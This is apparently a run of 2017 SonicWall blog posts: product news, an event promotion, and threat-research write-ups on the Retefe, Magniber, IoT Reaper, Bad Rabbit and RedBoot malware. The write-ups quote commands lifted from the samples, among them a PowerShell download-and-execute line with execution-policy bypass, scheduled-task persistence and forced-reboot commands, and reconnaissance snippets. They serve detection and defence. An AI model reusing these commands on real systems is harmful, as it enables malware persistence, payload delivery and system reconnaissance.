Move to the Cloud and Enable Secure Collaboration with SonicWall SMA OS 12.1

Moving to the cloud and enabling mobility are top IT priorities for organizations of all sizes. Today, most business have adopted a hybrid IT model, which includes legacy on-premise applications in local data centers and popular SaaS applications hosted in the cloud.

Securing this hybrid IT environment, while providing a consistent experience — with anytime, any device, any application access to authenticated users — remains a key challenge for the IT department.

Keeping those priorities in mind, SonicWall today launched the new OS 12.1 for its Secure Mobile Access (SMA) appliances.

Move to the Cloud

For organizations embarking on a cloud migration journey, SMA offers a single sign-on (SSO) infrastructure that uses a single web portal to authenticate users in a hybrid IT environment. Whether the corporate resource is on-prem, on the web or hosted in the cloud, the access experience is consistent and seamless. SMA also integrates with industry-leading multi-factor authentication technologies for added security.

Mobility and BYOD

For organizations wishing to embrace BYOD, flexible working or third-party access, SMA becomes the critical enforcement point across them all. SMA delivers best-in-class security to minimize surface threats, while making organizations more secure by supporting the latest encryption algorithms and ciphers.

SonicWall SMA allows administrators to provision secure mobile access and role-based privileges so end-users get fast, simple access to the business applications, data and resources they require. At the same time, organizations can institute secure BYOD policies to protect their corporate networks and data from rogue access and malware.

Managed Service Providers

For managed service providers or organizations hosting their own infrastructure, SMA provides turnkey solutions to deliver a high degree of business continuity and scalability. SMA can support up to 20,000 concurrent connections on a single appliance, with the ability to scale upwards of hundreds of thousands of users through intelligent clustering.

Data centers can reduce costs with active-active clustering and a built-in dynamic load balancer, which reallocates global traffic to the most optimized data center in real time based on user demand. SMA tool sets enable service providers to deliver services with zero downtime, allowing them to fulfill very aggressive SLAs.

Key New Features

The new 12.1 firmware addresses the above uses cases with the following new capabilities:

Federated Single Sign-On

SMA OS 12.1 delivers secure access from a single URL to Microsoft Office 365 and other cloud SaaS applications that use the SAML 2.0 authentication protocol. SMA fits seamlessly into an organization’s existing infrastructure and enables federated single sign-on (SSO), using a single pane-of-glass web access portal, to applications hosted in the cloud or in a local data center. A single login event (without requiring a VPN tunnel) can create a secure session for authenticated users with authenticated devices to any business application.

Read our tech brief to find how SonicWall SMA achieves identity federation for access requests initiated by both service providers and identity providers.

Secure File Share

The release innovates in the realm of access security by offering the capability to scan files uploaded by unmanaged endpoints to the corporate network. Documents uploaded using personal or BYOD devices (unmanaged endpoints) by remote workers, third-party contractors or office employees with full VPN access to corporate network, typically bypass network security and are not inspected by a firewall. SMA OS 12.1 addresses this security gap by providing a secure file share mechanism.


Read our tech brief to find how SonicWall SMA stops malicious files from entering your corporate network.

SMA provides a web-based HTML5 file explorer for users to upload their documents, which are scanned by the cloud-based, multi-engine Capture ATP sandbox service for ransomware, zero-day threats and unknown malware. The verdict is delivered in near real-time, and suspicious files are rejected.

Capture ATP file scan reports are available on with detailed user session information.

The central management server (CMS) for SMA provides reporting and monitoring capabilities, including Capture ATP test results and session information (such as user ID and IP address). In addition, when the solution is deployed with a SonicWall next-generation firewall, SMA shares the session information with the firewall. This enables end-to-end network visibility, and provides an audit trail for reporting and compliance.

Universal Session Persistence

An enhancement to the global high-availability feature is session persistence in the event of a failover. User session data is replicated across the mesh network of SMA appliances in an active-active global cluster. In the event of a disaster or appliance failure, service owners can now deliver zero-impact failover that provides a frictionless experience to users without the need to re-enter credentials. This feature empowers service providers to adhere to stringent Service Level Agreements (SLAs) and deliver near zero downtime service.

New Licenses

In addition to new features, SMA OS 12.1 introduces “Secure Email Access” subscription licenses. This enables organizations to implement and pay only for their specific usage scenario (e.g., email with ActiveSync or Outlook Anywhere), significantly reducing total cost of ownership for customers. These licenses are centrally managed and distributed in real time based on user demand, across global datacenters.

SonicWall SMA OS 12.1 builds upon the vision to deliver true “anytime, any device, any application” secure access to your workforce. The solution enables organizations to embrace mobility and BYOD without fear, and move to the cloud with ease.

SMA OS 12.1 is compatible with SMA appliances 6200, 7200, 8200v and EX 9000. Customers with an active support contract are eligible for a free upgrade on Download the new SonicWall SMA 12.1 here.

New version of Retefe Banking Trojan Uses EternalBlue

Retefe Banking Trojan first appeared in mid 2013 targeting Switzerland, Austria and Sweden and some banking sites in United Kingdom. It spread through spam campaign pretending to be from Swiss banks containing malicious RTF attachment that had embedded malicious executable either .exe file or control panel file (.cpl).

Retefe makes the following changes in a victim’s machine:

  • Changes the DNS setting to a rouge DNS server.
  • Installs Rouge CA (Certificate authority).

Changing the DNS setting now allows the victim’s online banking session to be redirected to a fake banking portal. The fake CA certificate installed is used to avoid SSL certificate errors when browsing the fake website.

In 2015, an updated Trojan was released which used Proxy auto-config (PAC) instead of a fake DNS. With this method,instead of redirecting the victim’s entire web traffic, only certain domain names configured in the PAC were redirected to the proxy server that served as the fake banking portal.

Below is the image showing the Proxy PAC configuration:

The SonicWall Capture Labs Threat Research team recently observed a new email campaign with an updated version of this threat. The updated version of Retefe malware has been observed to use the EternalBlue exploit to spread internally on the network.

The email contains a document file attachment which contains a Package Shell Object or an OLE object which in this case is a windows shortcut (.lnk) file:

The above image shows the document file delivered by email which the contains OLE object. Upon clicking on the .lnk file, it shows a warning message as shown in the above image. It subsequently runs the PowerShell command:

The target field of the OLE object contains an obfuscated PowerShell command. After de-obfuscation, we can see it downloads the payload from URL: Hxxp://

The downloaded executable payload file in the current campaign is a self-extracting ZIP archive that contains an obfuscated JavaScript file. This obfuscated JavaScript is the installer, below is the extracted obfuscated JavaScript file:

The de-obfuscated JavaScript:

In the above de-obfuscated JavaScript, there are several parameters in “cfg”:

  • dl:- It is a list of proxy servers that are hosted in TOR.
  • cert:- A fake root certificate encoded by Base-64.
  • ps:- Base-64-encoded PowerShell script to install certificate for Internet Explorer.
  • psf:- Base-64-encoded PowerShell script to install certificate for Firefox.
  • pstp:- Base-64-encoded PowerShell script that downloads and installs TOR.
  • pseb:- Base-64-encoded PowerShell script which contains EternalBlue exploit to spread.

The JavaScript decodes the above parameters in “cfg” one at a time. The decoded parameters are additional PowerShell scripts that perform the intended activities such as installing TOR, installing a certificate for Internet Explorer, installing a certificate for Firefox and implementing EternalBlue exploit.

First, the JavaScript installs the TOR and other utilities by running a PowerShell script:

The above Base64 encoded function translates to “cfg.pstp” parameter which then executes the script using Powershell. It first creates a random number, and uses this random number as an index to select the domain from the “cfg.dl” (TOR hosted domains), and replaces %DOMAIN% with the selected domain within the PowerShell script (in this case, cfg.pstp). It then executes the decoded script with PowerShell using the parameters: – ExecutionPolicy Unrestricted -File. The decoded PowerShell Script which downloads and installs TOR is shown below:

The above script (cfg.pstp) downloads the TOR from one of the TOR mirror sites at %appdata%Ad0be. Then it adds a scheduled task to start the TOR browser (tor.exe). The scheduled task is executed in the context of “mshta.exe”, as the actual command to be executed is wrapped inside the JavaScript.

It also downloads socat.exe and creates a scheduled task for it:

The purpose of this schedule task is to setup the TOR socks proxy where the %DOMAIN% is replaced by one of the tor sites present in the JavaScript.

The JavaScript then decodes another PowerShell script that installs the certificate for IE:

The above Base64 encoded function decodes to “” and replaces %CERT% in the decoded script with a fake root certificate “cfg.cert”. It then executes the PowerShell with parameters: – ExecutionPolicy Unrestricted -File

Below is the PowerShell script to the install certificate for IE:

After installing the certificate, it installs PAC (proxy-auto config) for Internet Explorer:

The following are the registry entries used to set the PAC:

  • HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoDetect
  • HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL

After installing certificate and PAC for IE, JavaScript decoded PowerShell script that installs the fake certificate for Firefox and installs PAC for Firefox:

PowerShell script to install certificate for Firefox:

InstallPac() to configure PAC for Firefox and unblocking DotOnion sites:

After installing the fake certificate and configuring the PAC for both IE and Firefox, it kills the following running applications:

  • taskkill /F /im iexplore.exe
  • taskkill /F /im firefox.exe
  • taskkill /F /im chrome.exe

The JavaScript finally decodes the PowerShell script that implements EternalBlue exploit. This script also uploads the log file to the remote server over ftp. The LogWrite() function in the script writes the log into the log file, UploadLog() function uploads the log file on the remote server as shown below:

The PowerShell collects the following information from the system to upload on the server; it uses CheckInstall() function for the same:

  • Operating System information.
  • $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);

  • PowerShell version.
  • Proxy Auto Config settings from the registry key: $pac=Get-ItemProperty ‘hkcu:Software\Microsoft\Windows\CurrentVersion\Internet Settings’|Select -expand AutoConfigURL -ErrorAction Stop;
  • Installed certificate on the machine, with subject filed of the certificate:
    *COMODO RSA Extended Validation Secure Server CA 2*
  • Information about tor and socat running on the system.
  • Directory list of: %AppData
  • Information about the installed AV on the machine:
    $avlist=(Get-WmiObject -Namespace “rootSecurityCenter2” -Query “SELECT * FROM AntiVirusProduct” @psboundparameters|Select -expand DisplayName);

After collecting the above information from the machine, the script finally executes the SMB EternalBlue exploit. The PowerShell script collects all the IP addresses in the network and invokes EternalBlue as shown below:

The EternalBlue() in the script contains a “payload” variable which has encoded data. After decoding the encoded data, it is revealed to have a PowerShell command that downloads another PowerShell Script from the server as shown below:
powershell -ep Unrestricted -ec $F=$env:Temp+’\s.ps1′;(New-Object System.Net.WebClient).DownloadFile(‘’,$F); Start-Process “powershell” -ArgumentList “-ep Bypass -f $F” -Wait NoNewWindow

This downloaded script from the above command contains Base-64-Encoded data:

The decoded data is nothing but another executable file that drops another JavaScript which is same as the pervious one, the only difference being the new JavaScript does not have the EternalBlue script to avoid the infinite loop of EternalBlue infection:

Sonicwall Capture Labs detects this threat via the following signatures:

  • GAV: Retefe.A_3 (Trojan)
  • GAV: Retefe.B (Trojan)

Protect Your Wireless Network from the KRACK WiFi Vulnerability

There’s a general feeling that WiFi is less secure than having a wired connection to the network. It could just be our perception that a signal travelling through air is easier to intercept than one moving across a physical Ethernet cable. When a new WiFi vulnerability is uncovered such as the one in WPA2 which Belgian researchers recently made public, it gets a lot of attention. And why not? After all, we use WiFi-enabled devices every day and most organizations provide WiFi to their employees, customers and guests. Therefore it’s reasonable to be nervous that your wireless access point may be at risk from KRACKs (key reinstallation attacks). But is this true for everyone?

In his blog, “Are There KRACKS in Your Wireless Network Security?” John Gordineer points out that SonicWall SonicWave wireless access points (APs) provide an extra level of protection against these attacks. Let’s take a closer look at how they do this. SonicWave APs provide something very few other access points on the market have – a third radio dedicated to security. Why is that important? Most access points have two radios. One operates in the 2.4 GHz frequency band and the other in the 5 GHz band. In order to perform security scanning for rogue APs, you need to take one of those radios away from its normal duties for a period of time. The problem is, this consolidates all wireless users onto a single radio, slowing the wireless performance providing a poor user experience. Now, you can schedule the scan for the middle of the night when there are fewer wireless users, but that’s like turning on a security camera for only 30 minutes each day. The odds that the attack occurs during this short window are pretty small. On the other hand, SonicWave APs use that third radio to scan for and block rogue access points 24×7 so you’re covered around the clock. If an unauthorized access point is detected it can be automatically disassociated from the network and traffic between the access point and clients will be blocked. Here’s how it looks in SonicOS, the firmware of the managing SonicWall firewall.

Let’s apply this to the WPA2 vulnerability that opens WiFi networks to key reinstallation attacks. Hackers within WiFi range can use KRACKs to steal sensitive organizational and personal information. To do this, the hacker attaches a rogue access point called an “evil twin” to the WiFi network, mirroring the MAC address and SSID of the real AP. Using certain techniques within the KRACK, the hacker redirects unpatched clients to connect to the rogue AP. Then, during the four-way handshake between the real access point and client device, the hacker launches a man-in-the-middle (MITM) attack and forces the client to reinstall an encryption key that’s been used already, something that the WPA2 protocol was thought to prevent. The WiFi client associates with the evil twin access point using unencrypted data transmissions making it easy for the attacker to read the communications.

SonicWave access points on the other hand protect against KRACKs in two ways. First, they don’t support the IEEE 802.11r Fast BSS Transition (aka fast roaming) which is vulnerable to KRACKs due to protocol deficiencies. And second, SonicWave access points use AES-CCMP for the key exchange, so the hacker cannot forge the key and join the network. To get around this, hackers may attempt to deploy an “evil twin” access point on a different WiFi channel to fool wireless clients into connecting to the rogue AP instead of the SonicWave AP. As I mentioned earlier, however, this won’t work with SonicWave APs due to the third radio which continually scans for and blocks rogue access points from connecting to the network using Wireless Intrusion Detection and Prevention. There’s even an option in the Wireless Intrusion Detection and Prevention settings to add evil twins to a list of rogue APs.

If you’re in the market for a new wireless access point check with the vendor to see if it comes with two radios or three like the SonicWave series. Having that third radio will provide you with a range of advantages you won’t get with standard two-radio APs including added protection against attacks like KRACK.

To dive deeper, watch the SonicWave Access Point Video.

New ransomware Magniber sets its target on South Korea

The Magnitude Exploit Kit is known for delivering the infamous Ransomware Cerber. The last version of the Cerber ransomware was also dropped by the Magnitude Exploit Kit in September 2017 but now the Magnitude Exploit Kit is also delivering a ransomware that has never been seen before.

The SonicWall Capture Labs Threat Research team recently became aware of Magniber and analyzed it. The name Magniber is derived from the names “Magnitude” and “Cerber”. The Magniber ransomware is different from the Cerber ransomware. The strange thing is that this ransomware is targeting a specific country as it performs encryption only in South Korea.


Before performing infection it checks the default UI language of the operating system using the kernel32 API GetSystemDefaultUILanguage as shown in the figure below. If the default UI language of the OS is Korean then it performs the infection otherwise it deletes itself and terminates the process.

After checking the UI language, it checks if the machine is already infected. To verify this, it checks for the mutex. The name of the mutex is the same as extension it uses for encrypted files. If this mutex is present, it deletes itself and terminates the process. Otherwise it creates this mutex to prevent the multiple execution. It also enumerates the %temp% folder to search for a file name with a length of 19 characters. If the file is found, it reads the file and compares the content with the Initial Vector (IV) of AES-128 encryption. If the contents of the file match with the IV, it assumes that the machine is already infected. Otherwise, it creates the file and writes the AES-IV to it. The IV is created at the beginning along with the AES key and extension that it uses for the encrypted file. It creates the AES-Key, File Encryption extension and AES-IV by moving a single byte as shown in the figure below:

Ransomware generates the 19 characters for file name of this temp file using multiple calls of API GetTickCount as shown in the figure below:

After performing all of the checks, it starts the infection process. It copies itself into a temp folder with the same name as the encrypted file extension and creates a task schedule for executing the sample every 15 minutes. It creates a task schedule in a hidden state by passing the Command line parameter to WinExec API as seen below.

“schtasks /create /SC MINUTE /MO 15 /tn ymdmf /TR “pcalua.exe -a %Temp%ymdmf.exe””

File Encryption

Finally it starts the encryption process. It enumerates all drives and creates a dedicated thread for encrypting each drive using API CreateThread by passing the thread parameter of drive letter. It uses the AES-128 algorithm for encrypting the file. The First 16 bytes of the encrypted file is the AES-IV that it uses for marker, after which, the encrypted data is stored. An Encrypted file is shown in figure below:

It skips all directories that contain the following path:

And encrypts the files with the following extension:

After encrypting the directory it drops a ransom note in each directory. In the ransom note, it drops the following URL from where the victim can find out how to decrypt the files:

The following is the ransom note:


On the payment site, the ransomware asks the victim to pay via bitcoin and explains how to do so. The Ransomware also promotes a discount to buy the decryption tool if bought within 5 days. The payment site of the ransomware is:

Finally it deletes itself after completing its execution and performing the all activities.

However the good news is, the decryption of encrypted files is possible without paying any ransom. Both, AES-Key and IV is present in payload file that is dropped in temp folder.

Sonicwall Capture Labs detects this threat via the following signature:

  • GAV: Magniber.A (Trojan)


Innovate More, Fear Less at CETPA 2017 with SonicWall for Your School Network

Recently, the personal information of Palo Alto High School students was published via a website that allowed students to see class rankings, grade-point averages and identification numbers. Is your school network at risk?

Know your best defense against new threats. Join SonicWall at Booth 904 at the 2017 CETPA Annual Conference on Nov. 14-17 in Pasadena, California. With over 3,000 K-12 schools and districts relying on SonicWall next-generation firewalls and real-time automated breach detection and prevention with SonicWall Advanced Threat Protection cloud sandboxing service, we’ll be onsite to share our expertise on the latest threats and best practices to stop cyber attacks.

Can’t-miss highlights include:

  • Solving Real-world Network Security Issues in Today’s K-12 Campus Environment
    • Speaker: Jenna Burrows, Director of Business Services, Calistoga Joint Unified School District.
    • Date & Time: 4 p.m., Nov. 14
    • Location: Room 204
    • Learn how this district, with the help of SonicWall Silver partner Napa Valley Networks, provides over 900 students and staff with secure, uninterrupted network access, protects students from harmful web content and stops hackers from stealing confidential records. We’ll also explore advantages of a managed SonicWall’s Security-as-a-Service (SECaaS) approach to network security.

“It’s really hard for districts, at any point, to have to lay out a large amount of money,” for projects of this type, says Burrows. “It’s just not reasonable. There’s really no value in us purchasing it outright, and then, say, it’s obsolete in a couple years anyway. It makes a lot more sense for us to do it monthly. It (SonicWall Security-As-A-Service) provides more flexibility but it’s also much more reasonable in terms of breaking out the costs, not having to pay a large upfront amount.” said Jenna Burrows, Director of Business Services, Calistoga Joint Unified School District.

  • Vendor Shootout: Capture Advanced Threat Protection Sandbox
    • Presenter: Tim Johnson, System Engineer, SonicWall
    • Date & Time: 8 a.m., Nov. 16
    • Examine and compare the effectiveness of SonicWall’s Capture ATP, a leading cloud sandboxing solutions in preventing zero-day and advanced threats. Following the shootout, discuss your specific needs with our experts at booth 904 in the exhibit hall from 9-4 p.m.
  • SonicWall Live Demos
    • Date & Time: 9-4 p.m.

Throughout the event, we’ll be showcasing the SonicWall Advanced Threat Protection sandbox service, the new SonicOS 6.5, NSA 2650 next-gen firewall, SonicWave Wireless Access Points,  Cloud Analytics and Secure Mobile Access 12.1 with ongoing demonstrations focused on:

  •  Advanced Threats: Watch our award-winning multi-engine sandbox, SonicWall Capture ATP, scan network traffic in the cloud, and block unknown files until our Capture Threat Network reaches a verdict in near real-time.
  • Encrypted Threats: Most web-based malware is hidden by SSL/TLS encryption. Watch our DPI-SSL uncover hidden malicious attacks, block C&C communications and stop data exfiltration.
  • Wireless & Mobile Threats: Wi-Fi and mobile devices present a major security risk for students, faculty and administrators. View our Wireless and Mobile Access solutions, including the new Secure Mobile Access (SMA) 12.1 and SonicWave 802.11ac Wave 2 wireless access points.
  • Email Threats: Email remains a primary vector for attacks, such as ransomware. Discover how our next-gen Email Security solution can block spoofed email attacks with hosted and on-premise configurations.
  • Restricted Web Content: Protect students and employees, and meet K-12 regulatory compliance. Watch our Content Filtering Client block inappropriate, unproductive, illegal and malicious web content on school-issued devices taken off campus.

SonicWall is dedicated to helping K-12 schools and districts innovate more and fear less. Realize the promise of technology-driven learning environments, on campus and over the web.

Join us at the 2017 CETPA Annual Conference, tune in via Twitter #CETPA2017 and follow @SonicWall.

The IoT Reaper botnet – Quiet before another storm

You may still remember the Mirai botnet and the record breaking DDoS on Dyn at the end of last year. There is now a new IoT botnet spreading in the wild – IoT Reaper. SonicWall Capture Labs Threat Research team has analyzed this threat. Please see IoT Reaper attack diagram below.

Comparing to the Mirai, the IoT Reaper malware has an upgraded spreading ability. It’s a well-collected exploit kit itself: 9 existing exploits targeting devices from popular IoT vendors such as Linksys and Dlink are integrated. And the author is still actively adding new exploit supports. Also, a LUA execution environment is integrated for a stronger development potential. Below is one example of the embedded LUA code:

According to the code in the malware, Lua 5.3.3 is used to execute either the hard-coded or newly downloaded Lua codes. There are also multiple features from Lua have been used such as SMTP, FTP and HTTP/HTTPS.

Due to wide spread of IoT reaper, we have noticed an elevated level of IoT targeted exploit activity. Below is the latest two months statistics of IoT device attacks observed in SonicWall Capture Threat Network, where we can see an obvious increase in such activity.

Also, 100+ DNS open resolvers were integrated in this malware, which may be used as reflector in real dns amplification attacks.

SonicWall Capture Labs Threat Research team has analyzed the malware and vulnerabilities associated with IoT Reaper and developed the following signatures:

  • IPS:13029 “D-Link 850L Admin Password Exposure”
    “Arbitrary files upload and command injection vulnerability in D-Link’s admin interface.”
  • IPS:13030 “WIFICAM Remote Code Execution”
    “Pre-auth RCE vulnerability in Wireless IP Camera (P2P) WIFICAM cameras”
  • IPS:13031 “Web Application Remote Code Execution 76”
    “Authentication bypass on Shodan DVRs”
  • IPS:13032 “NETGEAR ReadyNAS Surveillance Remote Command Execution”
    “RCE on network video recording (NVR)’s web interface”
  • IPS:13033 “Vacron NVR Remote Command Execution”
    “RCE on network video recording (NVR)’s web interface”
  • IPS:13034 “NETGEAR DGN Devices Remote Command Execution”
    “Authentication bypass on DGN’s admin web interface”
  • IPS:9804 “Linksys E1500/E2500 Remote Command Execution”
    “OS Command Injection on admin URLs”
  • IPS:2020 “D-Link DIR-300 Remote Command Execution 1”
    “OS Command Injection (unauthenticated) on admin URLs”
  • IPS:13035 “AVTECH Devices Remote Command Execution”
    “Unauthenticated command injection in admin URLs”
  • GAV: Reaper.A (Trojan)
  • GAV: Reaper.B (Trojan)
  • GAV: Reaper.C (Trojan)
  • GAV: Reaper.D (Trojan)
  • GAV: Reaper.E (Trojan)

Bad Rabbit Ransomware: The Latest Attack

What Is Bad Rabbit Ransomware?

On Tuesday, Oct. 24, a new strand of ransomware named Bad Rabbit appeared in Russia and the Ukraine and spread throughout the day. It first was found after attacking Russian media outlets and large organizations in the Ukraine, and has found its way into Western Europe and the United States. The initial installer masquerades as a Flash update but is believed to be an updated version of NotPetya, since the infection chain and component usage is identical.  Interestingly, this malware contains a list of hardcoded Windows credentials, most likely to brute force entry into devices on the network.  According to SonicWall Capture Labs Threat researchers, Bad Rabbit spreads using the SMB protocol within Windows. We should think of it as a bug fix maintenance release of NotPetya (within EternalBlue method of propagation removed). The purpose of using the SMB protocol is to spread laterally across an organization. 

Are SonicWall Customers Protected from Bad Rabbit?

Yes. SonicWall Capture Labs released signatures to protect against Bad Rabbit malware, which are available for anyone with an active Gateway Security subscription (GAV/IPS).  In addition, SonicWall Capture Advanced Threat Protection (ATP) sandboxing service is designed to provide real-time protection against new strains of malware, even before signatures are available on the firewall. SonicWall Capture ATP customers will be protected against new forms and copycat versions of this malware. Multiple variations of this ransomware strain have been processed in Capture ATP, with a 100 percent success rate of catching it.

How Can I Stop Ransomware Like Bad Rabbit?

SonicWall customers should immediately ensure they have the Capture Advanced Threat Protection sandbox service turned on with their next-generation firewalls, and have the Block Until Verdict feature activated.  For Bad Rabbit, there is no need to manually update the signatures on SonicWall firewalls, as they are automatically propagated to the worldwide installed base upon deployment.

General recommendations for everybody, regardless of their security vendor, include:

  • Apply all patches to operating systems
  • Protect endpoints with an up-to-date anti-virus solution
  • Promote good password hygiene policies
  • Ensure firewall and end point firmware is current
  • Implement a network sandbox to discover and mitigate new threats
  • Deploy a next-generation firewall with a gateway security subscription to stop known threats

I will update this post as analysis of Bad Rabbit ransomware develops.  For more information, read the SonicAlert posting from SonicWall Capture Labs Threat Research Team. To learn more about ransomware defense, please read our Solution Brief: Eight Ways to Protect Your Network Against Ransomware.

Mobile Security: What is the Attacker’s Motivation to Compromise?

As technologists we too easily get lost in discussing problems and solutions, rather than thinking about the motives behind attacks.

In terms of security, we should consider the mobile endpoint similar to any other endpoint.  Unfortunately, organizations typically find that mobile endpoints do not have the same level of security enforcement, as they would for instance on a managed Windows endpoint. So, in many ways, a mobile endpoint is a harder platform to protect than a desktop.

The vast majority of threats to the endpoint come from malware. While malware has traditionally been designed to either allow remote control or logging keystrokes on the endpoint, we are seeing a massive surge in ransomware.

Ransomware is a highly profitable business, relatively easily purchased and often undetectable as cyber criminals often try to exploit new undefined vulnerabilities. Although ransomware currently targets vulnerabilities in desktop operating systems and browsers, we expect the threat to mobile will increase over the next 24 months. Make sure you back up your photos!

To understand the motives of an attacker against mobile devices, we need to think not only about the type of data stored on the mobile endpoint, but also the level the endpoint can access. For instance:

Data stored on a personal mobile device may include:

  • Payment or banking applications
  • Work email

Data stored on a corporate-managed mobile may be:

  • Corporate applications
  • Stored credentials for other systems
  • Sensitive intellectual property

Payload delivery

According to the most recent Verizon Data Breach Investigations Report, email still delivers more than 75 percent of malware either through attachments or links. More and more, sophisticated techniques are using social media as a mechanism to target through phishing campaigns.

For mobile, we are also seeing new techniques involving multiple zero-day exploits to hijack out-of-band communications, like Bluetooth. Rogue wireless access points are also used for transport redirection, malicious code injection and interception of private data in transport.

Zero-day exploits and APTs

Exploits will only work on vulnerable systems, so breach prevention — specifically from zero-day attacks — is crucial for any and all endpoints, including mobile. Traditional anti-virus protection is a good best practice, but the smaller the threat window, the less the risk.

Leaky apps

Another recent approach used to help protect organizations data is by scoring mobile applications using Mobile App Reputation (MARS). Only allowing trusted applications onto corporate-owned mobile devices is ideal, but it’s not an easy policy to implement for personal mobile devices.

Lateral movement

Consider email for a minute. Would you trust an email from a known colleague? Would you open any attachment or link from them? Maybe not if you check the email header and see it’s coming from an external source. But what about if this was sent from an internal email address? A compromised mobile endpoint may just become a launching point for other attacks.

Mobile Threat Detection (MTD) goes a way to help solve this, but doesn’t provide an overarching solution of the endpoint estate. It’s another point solution, with little to no knowledge of the environment around it.

Defending the mobile endpoint to corporate network with SonicWall

Attackers are looking to gain control of mobile endpoints to steal money from the consumer and gain access to the corporate environment to steal data. Also, from the perspective of accessing the corporate network, having the ability to quickly detect and re-mediate rogue access is imperative. SonicWall’s automated real-time breach detection and prevention helps close the major attack vectors in a unified way.

Defend your network today and protect your mobile endpoints, ready our Solution Brief: Best Practices for Secure Mobile Access


BadRabbit ransomware spreads fast through Russia and Ukraine

SonicWall Capture Labs Threat Research team became aware of and analyzed the BadRabbit ransomware that has been spreading actively.

Upon execution it drops the following files on the system:

  • c:Windowsinfpub.dat [1d724f95c61f1055f0d02c2154bbccd3 – detected as BadRabbit.CM ( Trojan )]
  • c:Windowsdispci.exe [b14d8faf7f0cbcfad051cefe5f39645f – detected as BadRabbit.RSM ( Trojan )]
  • c:Windowscscc.dat

It then runs it using rundll32 with the following parameters:
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

infpub.dat contains a list of hardcoded Windows credentials, most likely to brute force and get an entry into the machines.

The malware then proceeds to encrypt files on the system with the following extensions:

Below is an instance where an image file Sunset.jpg is affected by this ransomware. The file extensions on the system remain the same but the encrypted file get a marker at the end – e.n.c.r.y.p.t.e.d.:

The ransomware adds two scheduled tasks

  • drogon – C:WINDOWSsystem32shutdown.exe /r /t 0 /f
  • rahegal – C:WINDOWSsystem32cmd.exe /C Start “” “C:Windowsdispci.exe” -id 3642970814 && exit

The task drogon is used to reboot the system whereas task rahegal is used to start the disk encryption.
It is interesting to note that drogon and rahegal are names of two dragons present in the famous TV series Game Of Thrones.

Once the system reboots, we see the ransomware screen once the system is back online:

Sonicwall Capture Labs continues to analyze this threat and will update this blog with the latest findings.

Sonicwall Capture Labs detects this threat via the following signatures:

  • 1d724f95c61f1055f0d02c2154bbccd3 – GAV: BadRabbit.CM (Trojan)
  • b14d8faf7f0cbcfad051cefe5f39645f – GAV: BadRabbit.RSM(Trojan)
  • fbbdc39af1139aebba4da004475e8839 – GAV: BadRabbit.DS(Trojan)

Update 1 – Oct 24,2017

The following steps can be taken to ensure the ransomware does not spread on the system even if it is executed on it:

  • Create and add the following file at the given location:
    • C:Windowsinfpub.dat
  • It is important to give read-only permissions to the file so that the ransomware cannot update it. This stops the ransomware at the step where it drops the file infpub.dat on the system
  • When the malware tries to execute infpub.dat it gets an error as shown below:

Update 2 – Oct 25, 2017

We confirm that BadRabbit is an updated version of NotPetya as the infection chain and component usage is identical.

The dropped c:windowsinfpub.dat DLL file contains 5 AES encrypted payloads.

  • 1) 32 bit Mimikatz binary
  • 2) 64 bit Mimikatz binary
  • 3) 32 bit DiskCryptor driver
  • 4) 64 bit DiskCryptor driver
  • 5) 32 bit Encoder/Decoder binary

Based on the system architecture (32 bit or 64 bit) the Mimikatz binary and the DiskCryptor driver is dropped into the windows folder. Mimikatz binary is named as c:windows.tmp and the DiskCryptor driver is named as c:windowscscc.dat. This DiskCryptor driver is a valid digitally signed driver released by the ReactOS Foundation ( cscc.dat file can also be used as a measure to stop the infection in the same way the infpub.dat file can be used as mentioned on our last update 1. The 32 bit Encoder/Decoder binary is named as c:windowsdispci.exe. The actual disk encryption and file decryption is done using this component. Next infpub.dat deletes itself from disk.

File encryption: The infpub.dat DLL next proceeds to enumerate all the files on the local disks and network attached drives checking their extensions as mentioned on the original blog to encrypt them using the public key it contains.

Lateral Propagation: The infpub.dat DLL next executes the dropped Mimikatz binary and connects to it using a named pipe and retrieves the credentials found by Mimikatz before deleting the Mimikatz binary. It then attempts to connect to other computers in the same subnet using the present user credentials, Mimikatz provided list of credentials and a hard coded list of usernames and passwords whichever is successful in accessing the admin$ administrative share of the remote computer. It drops a copy of the DLL and creates a service on the remote computer, first directly by connecting to the remote service manager and if does not work then using wmic. This lateral propagation method is identical to its previous version, the NotPetya malware. Although the NotPetya version was using the EternalBlue exploit and this version is not

Disk Encryption: The infpub.dat DLL creates a scheduled task which reboots the system after 15 mins. The infpub.dat DLL had already registered the DiskCryptor driver (cscc.dat) to load on boot. This driver on load adds itself as a volumn filter driver. The infpub.dat DLL also created another scheduled task to run the Encoder/Decoder binary (dispci.exe) on startup. So once windows boots, the dispci.exe now connects to the DiskCryptor driver using the device Devicedcrypt and performs rest of the activity. The original MBR is backed up in encrypted form and the custom MBR supplied by the dispci.exe is written by the DiskCryptor driver. Next the dispci.exe also encrypts the logical volumes of the first hard drive before rebooting the system. On reboot the infected MBR presents a password prompt.

Decryption: If the correct password is provided to the boot prompt then the original encrypted MBR is recovered and the logical volumes are also decrypted to perform a complete boot. Next the same Encoder/Decoder binary (dispci.exe) should be executed without any parameters which will present another password prompt. The correct password would decrypt the encrypted files as well. So unlike the previous NotPetya version, this version has capability to completely reverse the encryption and give the files back.

Update 3 – Oct 27, 2017

We confirm the presence of EternalRomance code as additional internal propagation technique. This code starts after a dynamically calculated sleep and this sleep time is variable.

EternalRomance code does its own host discovery / network enumeration (does not rely on network enumeration / host discovery of main code) and there does not seem to be any dependency on the main code. Thus, it seems like the author put this code in as a quick, last minute addition.

The newly discovered RedBoot ransomware can alter Master Boot Records.

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of RedBoot Ransomware [RedBoot.A] actively spreading in the wild.

RedBoot encrypts the victims files with a strong encryption algorithm, replaces the Master Boot Record (MBR ) of the system drive and then then modifies the partition table in some manner until the victim pays a fee to get them back.

Infection Cycle:

The Malware adds the following files to the system:

  • Malware.exe

    • %Userprofile%[Random Numbers] assembler.exe

      • Compiler, Compile the boot.asm assembly file into the MBR boot.bin file.

    • %Userprofile%[Random Numbers]boot.asm

    • %Userprofile%[Random Numbers]boot.bin

    • %Userprofile%[Random Numbers]overwrite.exe

      • Re-write existing MBR, with the newly compiled boot.bin.

    • %Userprofile%[Random Numbers]main.exe

      • Encryptor Program.

